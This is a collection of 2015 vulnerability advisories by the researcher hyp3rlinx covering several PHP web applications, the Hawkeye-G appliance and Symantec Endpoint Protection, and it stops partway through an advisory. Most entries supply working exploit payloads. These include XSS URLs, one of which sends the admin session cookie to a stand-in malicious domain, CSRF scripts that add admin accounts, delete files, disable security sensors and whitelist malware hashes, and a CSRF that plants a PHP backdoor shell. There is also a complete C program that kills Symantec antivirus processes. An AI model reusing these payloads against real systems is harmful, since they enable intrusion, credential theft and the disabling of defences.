[+] Credits: hyp3rlinx [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MYSQLLITEADMINISTRATOR0621.txt Vendor: = code.google.com/p/mysql-lite-administrator Product: == mysql-lite-administrator(beta1) Advisory Information: == Multiple XSS vulnerabilities Vulnerability Details: == mysql-lite-administrator is vulnerable to XSS attacks, the application escapes injected strings. e.g. 'HELL' becomes \'HELL\' but we can easily defeat that using Javascript functions String.charCodeAt() & String.fromCharCode() XSS Exploit code(s): http://localhost/mysql-lite-administrator(beta1)/tabella.php?table_name=alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=1&table_name=alert(666) http://localhost/mysql-lite-administrator(beta1)/coloni.php?num_row=">alert(String.fromCharCode(72,69,76,76)) http://localhost/mysql-lite-administrator(beta1)/insert.php?table_name=alert(666) Disclosure Timeline: = Vendor Notification: NA June 21, 2015 : Public Disclosure Severity Level: = Med Description: == Request Method(s): [+] GET Vulnerable Product:[+] mysql-lite-administrator (beta1) Vulnerable Parameter(s): [+] table_name, num_row Affected Area(s): [+] tabella.php & coloni.php === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx)
GeniXCMS XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-GENIXCMS0621.txt
Vendor:
=
genixcms.org
Product:
=
GeniXCMS v0.0.3 is a PHP based content management system
Advisory Information:
===
Multiple persistent & reflected XSS vulnerabilities
Vulnerability Details:
=
GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS
XSS Exploit code(s):
Persistent XSS:
---
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=
1-content input field
content injected XSS will execute after posting is published
2-title input field
title injected XSS will execute immediate.
Relected XSS:
-
http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'alert('XSS
By Hyp3rlinx')
Disclosure Timeline:
=
Vendor Notification: NA
June 21, 2015 : Public Disclosure
Severity Level:
=
Med
Description:
=
Request Method(s): [+] GET & POST
Vulnerable Product:[+] GeniXCMS 0.0.3
Vulnerable Parameter(s): [+] q, content & title
Affected Area(s): [+] index.php
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar, provided
that
due credit is given to the author. The author is not responsible for any misuse
of the
information contained herein and prohibits any malicious use of all security
related
information or exploits by the author or elsewhere.
(hyp3rlinx)
novius-os.5.0.1 Persistent XSS, LFI & Open Redirect Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-NOVIUSOS0629.txt
Vendor:
===
community.novius-os.org
Product:
===
novius-os.5.0.1-elche is a PHP Based Content Management System
community.novius-os.org/developpers/download.html
Advisory Information:
===
Persistent XSS, LFI & Open Redirect
Vulnerability Details:
==
Persistent XSS:
---
Users can inject XSS payloads that will be saved to MySQL DB, where they will
execute each time when accessed.
1- In Admin under 'Media Center' users can inject XSS payloads and save to the
'media_title' field for a saved media file,
create a new media page inject payload click save and then select visualize.
2- Under Website menus area users can inject XSS payloads and save for the
'menu_title' field for a Website menu.
If we view browser source code at
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview
the XSS is output to its HTML entities.
e.g.
But within the same webpage for tag you can see it is not.
e.g.
alert('HELL')
Local File Inclusion:
-
We can directory traverse access and read files outside of the current working
directory in the Admin area by abusing the 'tab' parameter.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../
Open Redirect:
--
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=
is open to abuse by supplying an malicious a location or file.
XSS Exploit code(s):
In 'Media Center' create a new media file, click edit and inject XSS payload
for the 'title' field click save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_media/media/insert_update/1
vulnerable parameter:
media_title
In 'Website Menu' create a new website menu item and inject XSS payload click
save and then select visualize.
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=admin/noviusos_menu/menu/crud/insert_update%3Fcontext%3Dmain%253A%253Aen_GB
http://localhost/novius-os.5.0.1-elche/novius-os/?_preview=1
vulnerable parameter:
menu_title
LFI:
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../SENSITIVE-FILE.txt
http://localhost/novius-os.5.0.1-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php
Open Redirect:
--
http://localhost/novius-os.5.0.1-elche/novius-os/admin/nos/login?redirect=http://www.SATANSBRONZEBABYSHOES.com
Disclosure Timeline:
==
Vendor Notification: NA
June 29, 2015 : Public Disclosure
Severity Level:
=
Med
Description:
Request Method(s): [+] GET & POST
Vulnerable Product:[+] novius-os.5.0.1-elche
Vulnerable Parameter(s): [+] media_title, menu_title, tab, redirect
Affected Area(s): [+] Login, Web Pages, Media Center & Website Menu
area
=
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that
it is not altered except by reformatting it, and that due credit is given.
Permission is
explicitly given for insertion in vulnerability databases and similar, provided
that
due credit is given to the author. The author is not responsible for any misuse
of the
information contained herein and prohibits any malicious use of all security
related
information or exploits by the author or elsewhere.
(hyp3rlinx)
phpLiteAdmin v1.1 CSRF & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPLITEADMIN0705.txt
Vendor:
bitbucket.org/phpliteadmin
Product:
phpLiteAdmin v1.1
Advisory Information:
CSRF & XSS Vulnerabilities
Vulnerability Details:
==
CSRF:
--
No CSRF token exists when making calls to various SQL operations
therefore we can get user to drop the whole database tables if they click
on our malicious link and table is known.
XSS:
--
There are three XSS vulnerabilities I point out first is use of 'PHP_SELF',
second is unsanitized parameter
for SQL statement when calling drop table method e.g.
'http://localhost/phpliteadmin.php?droptable=[XSS]'
and third is an unsanitized 'table' parameter e.g.
'http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'
Lets look at the first one more in depth as its more fun.
phpliteadmin uses a PHP reserved server variable $_SERVER['PHP_SELF'] which is
vulnerable if not used correctly
allowing us to inject an XSS payload to steal session cookies and navigate them
to a place of our choosing
in order to cause mayhem.
On line 32 of 'phpliteadmin.php' we find vulnerable code:
//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']);
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];
//constants
define("VERSION", "1.1");
define("PAGE", $thisName);
---
In PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document root."
ref: http://php.net/manual/en/reserved.variables.server.php
It is known $_SERVER['PHP_SELF'] can make your application insecure as we can
inject code following a forward slash "/"
But we have slight problem to overcome, we can execute code but our forward
slashes will not be processed correctly
and exploit will FAIL! leaving us with the following useless URL instead of
taking the victim to a domain of our choice.
Fail exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"
Failed Result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org
But all is NOT lost!, we will construct our malicious URL forward slashes in
our JS call to window.open() method using
String.charCodeAt(58) for ':' and String.charCodeAt(47) for '/' which will NOW
give us what we seek, control over the users browser
taking them to some terrible dark place.
Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:
Tada!, our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'hyp3rlinx.altervista.org';window.open(x);})()"
Exploit code(s):
===
XSS(s) POC:
--
1- $_SERVER['PHP_SELF'] XSS exploit steals current admin session cookie and
sends to remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/";'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"
2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=alert(666)
3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table="/>alert(666)
CSRF POC:
-
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1
Disclosure Timeline:
=
Vendor Notification: NA
July 5, 2015 : Public Disclosure
Severity Level:
=
Med
Description:
==
Request Method(s): [+] GET
Vulnerable Product: [+] phpliteadmin_v1-1
Vulnerable Parameter(s):[+] $_SERVER['PHP_SELF'], droptable, table
Affected Area(s): [+] Admin
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
(hyp3rlinx)
Symantec EP 12.1.4013 Disabling Vulnerability
#include
#include
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"
/*
By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015
Goal:
Kill Symantec EP agent & services after globally locking down endpoint
protection via the
Symantec central management server and enabling globally managed password
protection controls. Tested successfully on Windows 7 SP1 result may vary OS to
OS.
Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...
*/
void el_crookedio_crosso(const char *victimo){
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);
while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE
hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}
DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}
void angelo_maliciouso(){
int AV=exeo_de_pid(SMC_EXE);
char id[8];
sprintf(id, "%d ", AV);
printf("%s", id);
char cmd[50]="Taskkill /F /PID ";
strcat(cmd, id);
system(cmd);
// system("Taskkill /F /IM Smc.exe"); //Access denied.
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint
Protection\\Smc.exe\" -disable -ntp");
Sleep(1000);
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);
}
int main(void){
puts("/*---*/\n");
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013|\n");
puts("| By hyp3rlinx - Jan 2015|\n");
puts("/**/\n");
SetDebugPrivileges();
angelo_maliciouso();
Sleep(1000);
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);
Sleep(2000);
angelo_maliciouso();
Sleep(6000);
return 0;
}
int SetDebugPrivileges(){
DWORD err=0;
TOKEN_PRIVILEGES Debug_Privileges;
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return
GetLastError();
HANDLE hToken=0;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){
err=GetLastError();
if(hToken)CloseHandle(hToken);
return err;
}
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
Debug_Privileges.PrivilegeCount=1;
if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
err=GetLastError();
if(hToken) CloseHandle(hToken);
}
return err;
}
phpSQLiteCMS CSRF, Unrestricted File Type Upload, Privilege Escalation & XSS CSRF, Unrestricted File Type Upload, Privilege Escalation & XSS
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPSQLITECMS0712.txt
Vendor:
phpsqlitecms.net
Product:
ilosuna-phpsqlitecms-d9b8219
Advisory Information:
==
CSRF, Unrestricted File type upload, Privilege escalation & XSS Vulnerabilities.
User will be affected if they visit a malicious website or click any infected
link.
Possibly resulting in malicious attackers taking control of the Admin / CMS
area.
Vulnerability Details:
=
CSRF:
-
We can add arbitrary users to the system, delete arbitrary web server files
and escalate privileges, as no CSRF token is present.
Add arbitrary user:
---
The following request variables are all that is needed to add users to system.
mode = users
new_user_submitted = true
name = "hyp3rlinx"
pw = "12345"
pw_r = "12345"
Privilege escalation:
-
Under users area in admin we can easily gain admin privileges, again using CSRF
vulnerability we
submit form using our id and change request variable to type '1' granting us
admin privileges.
e.g.
mode:users
edit_user_submitted:true
id:3
name:hyp3rlinx
new_pw:
new_pw_r:
type:1 <--make us admin
Delete arbitrary files:
The following request parameters are all we is need to delete files from media
or files directorys
under the web servers CMS area.
mode=filemanager
directory=files
delete=index.html
confirmed=true
XSS:
-
We can steal PHP session cookie via XSS vulnerability
Unrestricted File Type Upload:
--
The files & media dirs will happily take .PHP, .EXE etc... and PHP scripts when
selected will execute
whatever PHP script we upload.
Exploit code(s):
===
1- CSRF POC Add arbitrary users to the system.
-
function doit(){
var e=document.getElementById('evil')
e.submit()
}
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php";
method="post">
2- CSRF privilege escalation POST URL:
--
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php
Privilege escalation request string:
mode=users&edit_user_submitted=true&id=3&name=hyp3rlinx&new_pw=&new_pw_r=&type=1
3- CSRF Delete Aribitary Server Files:
--
Below request URL will delete the index.html file in files dir on web server
without any type
of request validation CSRF token etc.
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=filemanager
&directory=files&delete=index.html&confirmed=true
XSS steal PHP session ID POC:
-
http://localhost/ilosuna-phpsqlitecms-d9b8219/ilosuna-phpsqlitecms-d9b8219/cms/index.php?mode=comments&type=0&;
edit=49&comment_id="/>alert('XSS by hyp3rlinx
'%2bdocument.cookie)&page=1
Disclosure Timeline:
=
Vendor Notification: NA
July 12, 2015 : Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s): [+] POST & GET
Vulnerable Product: [+] ilosuna-phpsqlitecms-d9b8219
Vulnerable Parameter(s): [+] comment_id, delete, type, new_user_submitted
Affected Area(s): [+] Admin & CMS
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
(hyp3rlinx)
Open-Web-Analytics-1.5.7 Cryptographic, Password Disclosure & XSS Vulnerabilities
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENWEBANALYTICS0721.txt
Vendor:
www.openwebanalytics.com
Product:
Open-Web-Analytics-1.5.7
Advisory Information:
===
Cryptographic, Password Disclosure & XSS Vulnerabilities
Vulnerability Details:
=
Cryptographic Weakness:
---
Passwords are stored in the database using MD5 hash algorithm
NON salted, we find in owa_lib.php,
public static function encryptPassword($password) {
return md5(strtolower($password).strlen($password));
}
Password Disclosure:
In owa_auth.php on line 329 we find saveCredentials() PHP function which saves
the
username & password as browser domain cookie leaving us direct access via XSS
attack.
function saveCredentials() {
$this->e->debug('saving user credentials to cookies');
setcookie($this->config['ns'].'u', $this->u->get('user_id'),
time()+3600*24*365*10, '/', $this->config['cookie_domain']);
setcookie($this->config['ns'].'p', $this->u->get('password'),
time()+3600*24*30, '/', $this->config['cookie_domain']);
}
XSS:
Application is vulnerable to XSS So, now we can access the Admin username &
password
credentials from our XSS attack, do a window.open() or whatever and send to a
remote server
then come back and login after performing offline crack of the hash. Since we
cannot seem
to echo the password using document.cookie we will use
window.document['cookie'] to gain
access to admin password. The application uses the admin username and password
as persistant browser
cookies which is our dream come true!
e.g. retrieved username & passwd via XSS ( owa_u=admin;
owa_p=76ffbb8d470d6a402b3c429f35be8a1a )
user: admin / passwd: abc123
Also a second XSS vector exists in Install PHP script via POST request in the
Email address field.
Exploit code(s):
XSS(s) POC:
1- Steal username & password XSS, in this example we inject our malicious
payload into the middle of the site ID hash.
http://localhost/Open-Web-Analytics-1.5.7/Open-Web-Analytics-1.5.7/index.php?owa_do=base.sitesInvocation&owa_siteId=e9144cf4%22/%3E%22--%3E%3CDIV%20id=%27HELL%27%20onMouseMove=alert%28window.document[%27cookie%27]%29;%3C!--
Injecting
Hawkeye-G v3.0.1.4912 CSRF Vulnerability CVE-2015-2878
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt
Vulnerability Type:
===
CSRF
CVE Reference:
==
CVE-2015-2878
Vendor:
===
www.hexiscyber.com
Product:
=
Hawkeye-G v3.0.1.4912
Hawkeye G is an active defense disruptive technology that detects,
investigates, remediates and removes cyber threats within the network.
Advisory Information:
Multiple CSRF(s) Vulnerabilities:
Vulnerability Details:
=
1- CSRF Add arbitrary accounts to system
vulnerable URL:
https://localhost:8443/interface/rest/accounts/json
vulnerable POST parameter:
'name'
2- CSRF modification of network sensor settings
-
a) Turn off 'Url matching' Sensor
b) Turn off 'DNS Inject' Sensor
c) Turn off 'IP Redirect' Sensor
vulnerable URL:
https://localhost:8443/interface/rest/dpi/setEnabled/1
vulnerable POST parameters:
'url_match'
'dns_inject'
'ip_redirect'
3- CSRF whitelisting of malware MD5 hash IDs
--
vulnerable URL:
https://localhost:8443/interface/rest/md5-threats/whitelist
vulnerable POST parameter 'id'
CSRF Exploit code(s):
/* Execute consecutive CSRF exploits */
function ghostofsin(){
var doc=document;
var e1=doc.getElementById('exploit_1')
e1.submit()
var e2=doc.getElementById('exploit_2')
e2.submit()
var e3=doc.getElementById('exploit_3')
e3.submit()
var e4=doc.getElementById('exploit_4')
e4.submit()
}
https://localhost:8443/interface/rest/accounts/json"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
Whitelist MD5 malware IDs CSRF:
---
In final CSRF POC to try an white list malware MD5 IDs will be a bit more
complex,
we need to submit form many times hidden in background using iframe so we stay
on same page.
Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a loop
an create some
numbers 8 bytes long and dynamically assign the 'id' value of the field and
execute multiple
POST requests in background, it will be hit or miss unless you know ahead of
time the MD5 ID
in the database your targeting.
e.g. Malware MD5 database ID 28240001
So Here we go!...
http://www.w3.org/TR/html4/loose.dtd";>
CSRF POC hyp3rlinx
https://localhost:8443/interface/rest/md5-threats/whitelist";
target="demonica" method="post">
var doc=document
var x=1000
function exorcism(){
x++
x=x+001
x=String(x)
var f=doc.getElementById('hell')
var e=doc.getElementById('id')
e.value=x
f.submit()
}
setInterval("exorcism()",100)
Disclosure Timeline:
=
Vendor Notification: June 30, 2015
July 24, 2015 : Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s): [+] POST
Vulnerable Product: [+] Hawkeye-G v3.0.1.4912
Vulnerable Parameter(s):[+] name, enable, id
Affected Area(s): [+] Network Threat Appliance, Local Domain
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
(hyp3rlinx)
Hawkeye-G v3 CSRF Vulnerability ***[UPDATED CORRECTED]
***[UPDATED CORRECTION] ***
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0724.txt
Vulnerability Type:
===
CSRF
CVE Reference:
==
CVE-2015-2878
Vendor:
===
www.hexiscyber.com
Product:
=
Hawkeye-G v3.0.1.4912
Hawkeye G is an active defense disruptive technology that detects,
investigates, remediates and removes cyber threats within the network.
Advisory Information:
Multiple CSRF(s) Vulnerabilities:
Vulnerability Details:
=
1- CSRF Add arbitrary accounts to system
vulnerable URL:
https://localhost:8443/interface/rest/accounts/json
vulnerable POST parameter:
'name'
2- CSRF modification of network sensor settings
-
a) Turn off 'Url matching' Sensor
b) Turn off 'DNS Inject' Sensor
c) Turn off 'IP Redirect' Sensor
vulnerable URL:
https://localhost:8443/interface/rest/dpi/setEnabled/1
vulnerable POST parameters:
'url_match'
'dns_inject'
'ip_redirect'
3- CSRF whitelisting of malware MD5 hash IDs
--
vulnerable URL:
https://localhost:8443/interface/rest/md5-threats/whitelist
vulnerable POST parameter 'id'
CSRF Exploit code(s):
/* Execute consecutive CSRF exploits */
function ghostofsin(){
var doc=document;
var e1=doc.getElementById('exploit_1')
e1.submit()
var e2=doc.getElementById('exploit_2')
e2.submit()
var e3=doc.getElementById('exploit_3')
e3.submit()
var e4=doc.getElementById('exploit_4')
e4.submit()
}
https://localhost:8443/interface/rest/accounts/json"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
https://localhost:8443/interface/rest/dpi/setEnabled/1"; method="post">
Whitelist MD5 malware IDs CSRF:
---
In final CSRF POC to try an white list malware MD5 IDs will be a bit more
complex,
we need to submit form many times hidden in background using iframe so we stay
on same page.
Seems all MD5 ID's end in 0001 and are 8 bytes in length, we just need a loop
an create some
numbers 8 bytes long and dynamically assign the 'id' value of the field and
execute multiple
POST requests in background, it will be hit or miss unless you know ahead of
time the MD5 ID
in the database your targeting.
e.g. Malware MD5 database ID 28240001
So Here we go!...
http://www.w3.org/TR/html4/loose.dtd";>
CSRF POC hyp3rlinx
https://localhost:8443/interface/rest/md5-threats/whitelist";
target="demonica" method="post">
var doc=document
var x=1000
exorcism()
function exorcism(){
x++
String(x)
x+="0001"
var f=doc.getElementById('hell')
var e=doc.getElementById('id')
e.value=x
x=x.substr(0,4)
f.submit()
}
setInterval("exorcism()",100)
Disclosure Timeline:
=
Vendor Notification: June 30, 2015
July 24, 2015 : Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s): [+] POST
Vulnerable Product: [+] Hawkeye-G v3.0.1.4912
Vulnerable Parameter(s):[+] name, enable, id
Affected Area(s): [+] Network Threat Appliance, Local Domain
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
(hyp3rlinx)
Hawkeye-G v3.0.1 Persistent XSS & Information Leakage
[+] Credits: John Page ( hyp3rlinx ) [+] Domains: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-HAWKEYEG0725.txt Vendor: www.hexiscyber.com Product: Hawkeye-G v3.0.1.4912 Hawkeye G is an active defense disruptive technology that detects, investigates, remediates and removes cyber threats within the network. Vulnerability Type: = Persistent XSS & Server Information Leakage CVE Reference: == N/A Advisory Information: = Persistent XSS: --- Hexis cyber Hawkeye-G network threat appliance is vulnerable to persistent XSS injection when adding device accounts to the system. The appliance contains an endpoint sensor that collects client information to report back to the Hawkeye-G web interface. When adding device accounts to the system XSS payloads supplied to the vulnerable id parameter 'name' will be stored in database and executed each time certain threat appliance webpages are visited. Server Information Disclosure: - We can force internal server 500 errors that leak back end information's. Stack traces are echoed out to the end user instead of being suppressed this can give attackers valuable information into the system internals possibly helping attackers in crafting more specific types of attacks. Exploit code(s): === Persistent XSS: --- https://localhost:8443/interface/rest/accounts/json"; method="post"> Accessing URL will execute malicious XSS stored in Hawkeye-G backend database. https://localhost:8443/interface/app/#/account-management vulnerable parameter: 'name' Server Information Leakage: --- These examples will result in 500 internal server error info disclosures: 1- https://localhost:8443/interface/rest/threatfeeds/pagedJson?namePattern=&page=0&size=25&sortCol=address&sortDir=%22/%3E%3Cscript%3Ealert%280%29%3C/script%3E 2- https://localhost:8443/interface/rest/mitigationWhitelist/paged?namePattern=WEB-INF/web.xml&page=0&size=0&source-filter= Disclosure Timeline: = Vendor Notification: June 30, 2015 July 25, 2015 : Public Disclosure Severity Level: = High Description: == Request Method(s):[+] POST & GET Vulnerable Product: [+] Hawkeye-G v3.0.1.4912 Vulnerable Parameter(s): [+] name, namePattern, sortDir Affected Area(s): [+] Network Threat Appliance === [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx
phpFileManager 0.9.8 CSRF Backdoor Shell Vulnerability
[+] Credits: John Page ( hyp3rlinx )
[+] Domains: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPFILEMANAGER0729.txt
Vendor:
phpfm.sourceforge.net
Product:
phpFileManager version 0.9.8
Vulnerability Type:
==
CSRF Remote Backdoor Shell
CVE Reference:
==
N/A
Advisory Information:
CSRF Remote Backdoor Shell Vulnerability
Vulnerability Details:
===
PHP File Manager is vulnerable to creation of arbitrary files on server
via CSRF which we can use to create remote backdoor shell access if victim
clicks our malicious linx or visits our malicious webpages.
To create backdoor shell we will need to execute two POST requests
1- to create PHP backdoor shell 666.php
2- inject code and save to the backdoor we just created
e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
Exploit code(s):
===
var
scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php¤t_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)
var
maliciouso="action=7&save_file=1¤t_dir=.&filename=666.php&file_data='"
blasphemer(maliciouso)
function blasphemer(payload){
var xhr=new XMLHttpRequest()
xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php";, true)
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
xhr.send(payload)
}
Disclosure Timeline:
=
Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure
Severity Level:
=
High
Description:
==
Request Method(s): [+] POST
Vulnerable Product: [+] phpFileManager 0.9.8
Vulnerable Parameter(s):[+] action, cmd_arg, file_data, chmod_arg,
save_file
Affected Area(s): [+] Web Server
===
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided
that it is not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information or
exploits by the author or elsewhere.
by hyp3rlinx
PHPfileNavigator 2.3.3 Persistent & Reflected XSS
[+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-PHPFILENAVIGATOR0812c.txt Vendor: pfn.sourceforge.net Product: === PHPfileNavigator v2.3.3 (pfn) Is state-of-the-art, open source web based application to complete manage your files and folders. Vulnerability Type: = Persistent & Reflected XSS CVE Reference: == N/A Vulnerability Details: = Multiple persistent XSS vulnerable fields exist on the 'Modify User' form. nome, usuario, email etc... We can leverage existing CSRF vulnerability to update a victimz profile and store malicious XSS payload or an malicious user can inject there own payloads when updating thier profilez affecting other users and the security of the whole application. Multiple reflected XSS exists as well for following PHP pages all with same vulnerable parameter 'dir' when issuing GET requests. pfn-2.3.3 application seems to filter out tags etc, but we can bypass this usinghttp://localhost/PHPfileNavigator/pfn-2.3.3/xestion/usuarios/index.php?PHPSESSID= e.g. Inject